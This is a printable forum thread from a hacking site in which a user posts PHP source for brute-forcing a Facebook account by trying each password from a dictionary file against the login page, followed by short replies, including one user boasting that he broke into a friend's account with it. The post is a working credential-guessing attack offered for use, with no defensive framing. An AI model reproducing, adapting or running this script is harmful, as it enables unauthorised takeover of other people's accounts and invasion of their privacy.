![]() |
|
Fac3book Bruteforcing (source) - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: PHP (https://sinister.ly/Forum-PHP) +--- Thread: Fac3book Bruteforcing (source) (/Thread-Fac3book-Bruteforcing-source) |
Fac3book Bruteforcing (source) - W0rM - 03-07-2012 Ok Guyz! To make this script work, you will need a server with apache & obviously where Brutef0rcing is concerned you will need a user/pass list You can easily find one. or make one! a word tool u can find on many cracking forums PHP Code: set_time_limit(0);
$username ="brute@force.org"; // username to brute force
$dictionary ="dictionary.txt"; // need dictionary to password list
function kontrol($kullaniciadi,$sifre){
$useragent = "Opera/9.21 (Windows NT 5.1; U; tr)";
$data = "email=$kullaniciadi&pass=$sifre&login=Login" ;
$ch = curl_init('https://login.facebook.com/login.php?m&next=http://m.facebook.com/home.php');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
$source=curl_exec ($ch);
curl_close ($ch);
if(eregi("Home</title>",$source)){return true;} else {return false;}
}
if(!is_file($dictionary)){echo "$dictionary is not file";exit;}
$lines=file($dictionary);
echo "Attack Starting..<br>";
sleep(10);
echo "Attack Started, brute forcing..<br>";
foreach($lines as $line){
$line=str_replace("\r","",$line);
$line=str_replace("\n","",$line);
if(kontrol($username,$line)){echo "<font face=tahoma color=green>[+]</font><font face=tahoma> username:$username , password:$line - P
assword found : $line</font><br>";$fp=fopen('cookie.txt','w');fwrite($fp,'');exit;}
else{echo "<font face=tahoma color=brown>[-]</font><font face=tahoma> username:$username , password:$line - Password not found :
$line</font><br>";}
}
?>
RE: Fac3book Bruteforcing (source) - indonesia21 - 03-31-2012 yeah ... i like this you script
RE: Fac3book Bruteforcing (source) - Arrival - 04-01-2012 Be shak Wo Log jo MUSALMANO main be-Hayai phelana chahtay hain un k liye dunya aor Akhirat mai dardNak Aazab hay (Surah Noor # 24, Ayat # 19, Para # 18) RE: Fac3book Bruteforcing (source) - AngstSec - 04-06-2012 All do respect but i thought facebook patched the bruteforcing i tried many and what makes this script special RE: Fac3book Bruteforcing (source) - W0rM - 04-24-2012 (03-31-2012, 05:09 PM)indonesia21 Wrote: yeah ...The Pleasure is all mine! (04-01-2012, 11:10 PM)Arrival Wrote: Be shak Wo Log jo MUSALMANO main be-Hayai phelana chahtay hain un k liye dunya aor Akhirat mai dardNak Aazab hay (Surah Noor # 24, Ayat # 19, Para # 18)yaar ye php script kay liye tha ya meray signature kay liye?? RE: Fac3book Bruteforcing (source) - AqworldThunder - 04-25-2012 Thanks for the share I got my friends account and he was like WTF How? I was all like trade secret
RE: Fac3book Bruteforcing (source) - Hemin Michael - 10-18-2013 wow i like it ♥ ♥ RE: Fac3book Bruteforcing (source) - chmod - 10-18-2013 (10-18-2013, 01:13 PM)Hemin Michael Wrote: wow i like it ♥ ♥ Don't dig up old posts especially just to say "thanks" or "I like it" /closed |